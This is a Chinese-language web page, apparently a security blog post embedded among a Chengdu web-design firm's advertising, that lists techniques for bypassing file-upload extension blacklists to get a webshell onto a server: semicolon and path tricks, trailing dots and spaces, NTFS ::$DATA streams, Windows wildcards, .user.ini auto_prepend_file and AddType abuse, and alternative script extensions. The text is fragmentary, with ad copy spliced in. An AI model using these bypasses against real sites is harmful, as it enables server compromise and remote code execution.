扫二维码与项目经理沟通
我们在微信上24小时期待你的声音
解答本文疑问/技术咨询/运营咨询/技术建议/互联网交流
当做代码的审计或者文件搞渗文章上传的时候有时候会遇到黑名单的验证码,比如常规的一些脚本名asp php jsp这种的不允许上传,下面是我总结的一些绕过的方法
成都做网站、成都网站设计服务团队是一支充满着热情的团队,执着、敏锐、追求更好,是创新互联的标准与要求,同时竭诚为客户提供服务是我们的理念。成都创新互联把每个网站当做一个产品来开发,精雕细琢,追求一名工匠心中的细致,我们更用心!
//可以用来读文件
//可以用来执行命令
sanr.php;.gif
sanr.asp;.jpg
sanr.asp/sanr.jpg
User.ini
auto_prepend_file:指定在每个PHP页面执行前所要执行的代码
auto_prepend_file=demo.gif (每个页面都会加载demo.gif)
AddTypeapplication/x-httpd-php .jpg
利用空格 demo.php空格
小数点去绕过 demo.php.
Ads数据流 demo.php::$DATA
Ads数据流(但文件是空) demo.php:jpg
Window通配符 demo.<<< 两者相结合拿到webshell
Tips:直接用3就可以 只不过延伸下window通配符的方法
Window通配符可以在包含文件的时候包含c:window/temp目录临时php文件(文件包含本地测试成功 但是实际***很少成功 因为session文件也是php开头 如同时匹配多个文件以php开头的这种,会拿到第一个php文件,不确保是自己上传的临时文件)
aSp pHp JsP
Asp:asa cer cdx
Aspx: ashx asmx ascx
Php: php3 phtml
Jsp: jspx jspf
sanr.php.xxxxxx
我们在微信上24小时期待你的声音
解答本文疑问/技术咨询/运营咨询/技术建议/互联网交流